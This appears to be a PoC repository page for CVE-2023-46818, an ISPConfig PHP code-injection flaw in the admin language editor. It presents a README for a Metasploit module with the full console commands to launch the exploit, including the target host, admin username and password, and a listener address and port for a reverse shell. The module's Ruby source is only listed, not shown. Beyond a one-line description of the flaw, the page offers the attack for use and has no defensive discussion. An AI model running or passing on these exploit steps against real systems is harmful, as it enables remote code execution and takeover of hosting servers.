CVE-2023-46818 PoC — ISPConfig 安全漏洞

Source

Associated Vulnerability

Description

Metasploit Modules

Readme

# Metasploit-module
Metasploit Module

![image](https://github.com/user-attachments/assets/9c78e7e6-c326-4379-ba12-820cffd9528b)


```bash
use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
```
An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled.

File Snapshot

 [4.0K]  /data/pocs/ea0ceda6d9a350f7970778e4710f4e8d90360451
├── [ 14K]  ispconfig_language_edit.rb
└── [ 464]  README.md

0 directories, 2 files

Remarks